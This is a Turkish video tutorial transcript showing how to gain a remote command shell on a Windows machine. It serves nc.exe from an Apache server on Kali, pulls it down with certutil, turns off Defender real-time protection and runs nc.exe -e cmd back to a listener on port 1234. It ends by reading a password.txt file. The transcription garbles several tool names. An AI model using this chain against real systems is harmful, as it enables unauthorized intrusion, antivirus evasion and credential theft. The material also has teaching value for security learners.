Herkese merhaba arkadaşlar. Yeni bir video ile karşınızdayım. Şimdi size e, bir Windows işletim sistemine uzaktan yani e, CMD üzerinden nasıl, nasıl erişim sağlanır, bu arka planda nasıl gerçekleşiyor, hangi kodları yürüterek biz bu e, uzaktan CMD ekranına yani bir bilgisayara uzaktan yönetebilir hale gelebiliriz. Bundan bahsedeceğim. Şimdi İlk olarak şimdi Windows işletim sistemine geliyorum. Burada CMD ekranına giriş yapacağım. Burada göstermek istediğim bir tane araç var. Saltutil aracı. bu Kali Linux içerisinde bulunan, chroot, wget gibi araçlara benzer bir araç. Yani dışarıdan dosya alışverişi, yani dosyayı içeriye aktarabilmek için gerekli olan bir araç Windows işletim sistemi içerisinde hazır olarak bulunuyor. O yüzden bu aracı kullanacağız. Şöyle, e, Slash soru işareti dediğim zaman da zaten Bu araçla alakalı, e, Komutla alakalı bilgiler alabilirsiniz. E, bunun dışında şimdi ilk olarak e, yapmamız gereken şey şu, e, Linux içerisinde bulunan bir nc.exe dosyası var. Bu da hazır olarak bulunuyor. Şimdi ben bu dosyayı bu Windows sistemi içerisine CMD üzerinden enjekte edeceğim. Daha sonra netcat aracıyla bir port dinlemesi yaparak da bu Windows işletim sistemin CMD ekranını uzaktan yönetebilir hale gelmek için belli başlı kodlar yazacağız. Şimdi ilk olarak şunu yaparak başlamamız gerekiyor. Yapmamız gereken bu nc.exe dosyasının konumunu bulmak. nc.exe diyorum. Şimdi normalde e, var www.html içerisinde olması gerekiyor bu nc.exe dosyasının. Eğer sizde burada değilse yapmanız gereken şey şu. Şimdi asıl bizim e, almamız gereken nc.exe dosyası bu, bu dosya. Bunu kopyalamam gerekiyor. E, var www.html içerisine. Sebebi şu. Bunu kopyalayacağım. Çünkü bizim servis Apache, Apache serverımızı açtıktan sonra bu dizin içerisinden bu kopyaladığımız nc.exe dosyasını Windows içerisine aktarmamız gerektiği için bunu var www.html dizin içerisine koymamız gerekiyor. Şimdi bir kontrol edelim, gerçekten VAR-WWHTML içerisinde bu dosya mevcut mu diye bakalım. ls diyorum Gördüğünüz gibi nc.exe dosyası, uzaktan yürütebileceğimiz trojan dosya burada. Şimdi bizim bunu tabii ki enjekte etmemiz gerekiyor ama bundan önce yapmamız gereken şey Apache server'ınızı aktif hale getirmek. Bunun için de şu komutu yazmam gerekiyor. Systemctl start apache 2 servis. kontrol edelim açık mı diye. Status komutuyla da servis açık mı kapalı mı bunu kontrol edebiliriz. Evet, aktif durumda şu anda. Yani e, dışarıdan her, e, bu servis üzerinden bir e, dosya alışverişi yapılabilir diyebiliriz. Şimdi ben burayı bir temizleyeceğim. E, Windows'ta e, bu dosyayı almamız gerekiyor. Bunun için e, az önce gösterdiğim Sertutil aracını kullanacağız. Sertutil diyorum. Daha sonra URL cache diyorum split diyorum. Trefe HTTP. Buraya Kali IP adresinizi yazmanız gerekiyor. Bunun için IP adres diyorum. Burada gördüğüm IP adresini kopyalayıp buraya yapıştırabiliriz veya yazabiliriz. 192, 168, 174, 128 diyerek yazıyorum. Daha sonra bu dizin içerisine yani bu servis içerisindeki nc.exe dosyasını yürütebilmek için e, ismini yazıyorum ve bu Windows işletim sistemi içerisinde nc.exe olarak kaydetmek istiyorum. Şimdi bunu bunu enterlamadan önce yapmamız gereken şey e, Windows güvenlik duvarı dışarıdan gelebilecek herhangi bir tehdide karşı herhangi bir trojan virüs gibi yani zararlı yazılımların bulunduğu e, dosyalara karşı e, dosyaları engellediği için Yapmamız gereken güvenlik duvarından e, bu dosyayı yani bu e, bu güvenlik duvarından bunu e, pasif hale getirmemiz gerekiyor. E, güvenlik duvarı ve ağ korumasının içerisine gidiyorum. E, buradan virüs ve tehdit korumasına geliyorum. Burada ayarları yönet seçeneğinden bakın virüs ve tehdit koruması ayarları yönet seçeneğinden gerçek zamanlı korumayı pasif hale getiriyorum. E, bu işte burada da yazıyor zaten e, ne anlama geldi. Şimdi bunu kapattıktan sonra tekrar CMD ekranıma geliyorum ve bu dosyayı içeriye engellekte edeceğim. Bakalım Windows bunu kabul ede edecek mi? Güvenlik duvarını pasif hale getirdikten sonra bakın gördüğünüz gibi e, şu anda içeride e, şu komutlardan da bahsedeyim. Şimdi URL cache komutu e, belirtilen URL'den bir dosyayı ön indirmek için kullanılan komut. Split komutu e, indirilen dosyayı daha küçük parçalara bölmek ve daha optimize bir şekilde indirebilmek için gerekli olan komut. Tref de ee, var olan dosyayı e, üzerine yazmak yani zorlaştırarak üzerine yazmak anlamına geliyor. Daha sonra da zaten IP adresini giriyoruz ve dosyanın ismini giriyoruz. Şimdi bundan sonra yapmamız gereken şey şu: Windows'ta Netcat aracıyla Netcat aracıyla nc yazılıyor. Ee, bir port e, dinlemesi yapacağım. 1, 2, 3, 4 numaralı port üzerinden ee, arkada bu buraya yüklediğimiz LC exe dosyasını çalıştırdıktan sonra bu port üzerinden bize bir e, CMD ekranı gelmesi gerekiyor. Bunun için Enter'lıyorum. Daha sonra Windows'a geliyorum. Ee, şimdi burada bir komut yazmamız gerekiyor. lc.exe Dire cmd ve Kalinux'in Kali IP adresi ve dinlediğiniz portun port numarasını enter dedikten sonra bakın şu anda cmd ekranının gelmesi gerekiyor gördüğünüz gibi cmd ekranı geldi arkada aslında bu olay bu şekilde çalışıyor yani bir herhangi bir hacker tabii ki bu saldırıyı bu şekilde yapmayacak çünkü zaten Windows işletim sistemine bir erişim sağlamadan e, komut üzerinde zaten herhangi bir cihaz yani üzerinde herhangi bir komut zaten çalıştıramazsınız yani bu olası bir şey değil. Ben arkada hangi olaylar dönüyor bunu göstermek istedim ve hangi araçları kullanıyorlar Hackerlar bunu göstermek istedim. Şimdi buradan birkaç ufak tefek şeylere bakabiliriz. CD, e, Desktop diyorum. Mesela dir dediğim zaman burada password.txt dosyasını okuyabilirim. Windows'larda Type seçeneğiyle Linux'larda Cat ile görüyorsak Windows'da Type seçeneğiyle Password Mesela Password.txt dosyasına Pardon Type Password txt.txt .txt. Mesela burada işte kullanıcının önemli bir bilgisi, önemli bir password dosyası varsa bunu ele geçirebiliyor. Hackerlar bu şekilde bir uzaktan uzaktan bir bilgisayara komut satırı üzerinden erişim sağlayabiliyor. Göstermek istediğim buydu. Eğer videoyu buraya kadar izlediyseniz ve beğendiyseniz like butonuna basmayı unutmayın.